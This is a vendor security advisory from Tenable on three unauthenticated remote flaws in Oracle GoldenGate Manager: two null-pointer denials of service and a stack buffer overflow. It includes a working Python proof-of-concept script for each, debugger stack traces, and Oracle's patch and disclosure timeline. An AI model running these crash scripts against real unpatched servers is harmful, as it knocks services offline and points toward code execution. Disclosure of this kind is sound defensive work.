Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Multiple Oracle GoldenGate Manager Vulnerabilities

Critical
← View More Research Advisories

Synopsis

While researching Oracle GoldenGate, Tenable found three vulnerabilities in GoldenGate Manager. GoldenGate Manager is the process that is in charge of monitoring, controlling, and reporting status on other GoldenGate components. The Manager listens on port 7809 where it accepts GoldenGate Software Command Interface (GGSCI) commands.

CVE-2018-2912: Unauthenticated Remote Denial of Service

A null pointer dereference can occur if an unauthenticated remote attacker provides a malformed command in the connection initiation. Specifically, an attacker can trigger the condition by sending a START and VERSION but omitting the separating tab character. The following is a proof of concept:

import sys
import struct
import socket

if len(sys.argv) != 3:
    print 'Usage: ./tab_deref.py <host> <port>'
    sys.exit(0)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] connecting to %s port %s' % server_address
sock.connect(server_address)
print '[+] sending crash text'
cmd = 'START VERSION'
length = struct.pack(">H", len(cmd))
sock.sendall(length + cmd)
print '[+] Fin.'
sock.close()

The proof of concept generates the following stack trace:

(gdb) bt
#0  0x00000000005d61f3 in check_messages (timeout=<optimized out>, dynamic_ports=...)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2710
#1  0x00000000005d7eb1 in main_loop ([email protected]=3, [email protected]=0x7fffffffde48)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2361
#2  0x00000000005d82a3 in mgr_main (argc=3, argv=0x7fffffffde48)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2493
#3  0x00000000005325e6 in ggs::gglib::MultiThreading::MainThread::ExecMain (this=0x7fffffffdc50)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1302
#4  0x00000000005369b7 in ggs::gglib::MultiThreading::Thread::RunThread ([email protected]=0xe3ea90)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:496
#5  0x0000000000536fcd in ggs::gglib::MultiThreading::MainThread::Run (this=<optimized out>, argc=<optimized out>, argv=<optimized out>)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1293
#6  0x00000000005d892b in main ()

CVE-2018-2913: Unauthenticated Remote Stack Buffer Overflow

A stack buffer overflow can occur if an unauthenticated remote attacker provides a malformed command. An attacker can trigger the condition by simply sending a long command. The following is a proof of concept:

import sys
import struct
import socket

if len(sys.argv) != 3:
    print 'Usage: ./buffer_overrun.py <host> <port>'
    sys.exit(0)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] connecting to %s port %s' % server_address
sock.connect(server_address)
print '[+] sending crash text'
cmd = 'Nessus\taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
length = struct.pack(">H", len(cmd))
sock.sendall(length + cmd)
print '[+] Fin.'
sock.close()

The proof of concept generates the following stack trace:

(gdb) bt
#0  0x00007fffefbfa428 in __GI_raise ([email protected]=6) at ../sysdeps/unix/sysv/linux/raise.c:54
#1  0x00007fffefbfc02a in __GI_abort () at abort.c:89
#2  0x00007fffefc3c7ea in __libc_message ([email protected]=1, [email protected]=0x7fffefd538a2 "*** %s ***: %s terminated\n")
    at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007fffefcdd56c in __GI___fortify_fail (msg=<optimized out>, [email protected]=0x7fffefd53884 "stack smashing detected") at fortify_fail.c:37
#4  0x00007fffefcdd510 in __stack_chk_fail () at stack_chk_fail.c:28
#5  0x00000000005daf09 in MGRSEC_check_client_access (instr=<optimized out>, 
    client_ip_addr=0xbe3868 <ggs::ggAdmin::AdminCtx::getInstance()::instance+904> "192.168.1.152", reply=0x7ffffffee3b0 "Access denied")
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgrsec.c:448
#6  0x6161616161616161 in ?? ()
#7  0x6161616161616161 in ?? ()
#8  0x6161616161616161 in ?? ()
#9  0x6161616161616161 in ?? ()
#10 0x6161616161616161 in ?? ()
#11 0x6161616161616161 in ?? ()
#12 0x6161616161616161 in ?? ()
#13 0x6161616161616161 in ?? ()
#14 0x6161616161616161 in ?? ()
#15 0x6161616161616161 in ?? ()
#16 0x6161616161616161 in ?? ()
#17 0x6161616161616161 in ?? ()
#18 0x6161616161616161 in ?? ()
#19 0x6161616161616161 in ?? ()
#20 0x6161616161616161 in ?? ()
#21 0x6161616161616161 in ?? ()
#22 0x6161616161616161 in ?? ()
#23 0x6161616161616161 in ?? ()
#24 0x6161616161616161 in ?? ()
#25 0x6161616161616161 in ?? ()
#26 0x6161616161616161 in ?? ()
#27 0x6161616161616161 in ?? ()
#28 0x6161616161616161 in ?? ()
#29 0x6161616161616161 in ?? ()
#30 0x0000030061616161 in ?? ()
#31 0x00000000000003e8 in ?? ()
#32 0x0000000000000000 in ?? ()

CVE-2018-2914: Unauthenticated Remote Denial of Service

Another null pointer dereference can occur if an unauthenticated remote attacker provides a malformed command. The condition is triggered when an attacker sends an incomplete REPORT command to the server. The following is a proof of concept:

import sys
import struct
import socket

if len(sys.argv) != 3:
    print 'Usage: ./report_dereference.py <host> <port>'
    sys.exit(0)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] connecting to %s port %s' % server_address
sock.connect(server_address)
print '[+] sending crash text'
cmd = 'Nessus\tREPORT'
length = struct.pack(">H", len(cmd))
sock.sendall(length + cmd)
print '[+] Fin.'
sock.close()

The proof of concept generates the following stack trace:

(gdb) bt
#0  __GI_____strtol_l_internal (nptr=0x0, endptr=0x0, base=10, group=<optimized out>, loc=0x7fffeff89420 <_nl_global_locale>)
    at ../stdlib/strtol_l.c:293
#1  0x00000000005d6d7c in strtol (__base=10, __endptr=0x0, __nptr=<optimized out>) at /usr/include/stdlib.h:336
#2  atoi (__nptr=<optimized out>) at /usr/include/stdlib.h:404
#3  check_messages (timeout=<optimized out>, dynamic_ports=...) at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2817
#4  0x00000000005d7eb1 in main_loop ([email protected]=3, [email protected]=0x7fffffffde48)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2361
#5  0x00000000005d82a3 in mgr_main (argc=3, argv=0x7fffffffde48)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/app/mgr/mgr.c:2493
#6  0x00000000005325e6 in ggs::gglib::MultiThreading::MainThread::ExecMain (this=0x7fffffffdc50)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1302
#7  0x00000000005369b7 in ggs::gglib::MultiThreading::Thread::RunThread ([email protected]=0xe3ea90)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:496
#8  0x0000000000536fcd in ggs::gglib::MultiThreading::MainThread::Run (this=<optimized out>, argc=<optimized out>, argv=<optimized out>)
    at /scratch/aime/adestore/views/aime_adc4150408/oggcore/OpenSys/src/gglib/ggstd/MultiThreading.cpp:1293
#9  0x00000000005d892b in main ()

Solution

Oracle released patches for these vulnerabilities in the October 2018 CPU. Follow Oracle's patching guidelines.

Additional References

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixGG

Disclosure Timeline

06-21-2017 - Reported to Oracle.
06-21-2017 - Oracle acknowledges that they received the information.
06-27-2017 - Oracle assigns bug tracking numbers.
07-24-2017 - Received status update from Oracle.
08-24-2017 - Received status update from Oracle.
09-24-2017 - Received status update from Oracle.
... Repeat monthly through 06-24-2018 ...
07-17-2018 - Tenable informs Oracle that they will publish an advisory next CPU, with or without a patch.
07-17-2018 - Oracle says they are looking into it.
07-25-2018 - Tenable pings Oracle.
07-25-2018 - Oracle responds they will try to issue a patch in the October CPU.
10-11-2018 - Oracle sends notice that these will be patched on October 16, 2018

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io

FREE FOR 30 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,275

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, email, community and chat support 24 hours a day, 365 days a year. Full details here.

Buy Now
Renew an existing license | Find a reseller
Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 30 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 30 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security

Get a Demo of Tenable.sc

Please fill out the form below with your contact information and a sales representative will contact you shortly to schedule a demo. You may also include a short comment (limited to 255 characters). Please note that fields with asterisks (*) are mandatory.

Try for Free Contact Sales

Try Tenable Lumin

FREE FOR 30 DAYS

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Buy Tenable Lumin

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

Request a demo of Tenable.ot

Get the Operational Technology Security You Need.
Reduce the Risk You Don’t.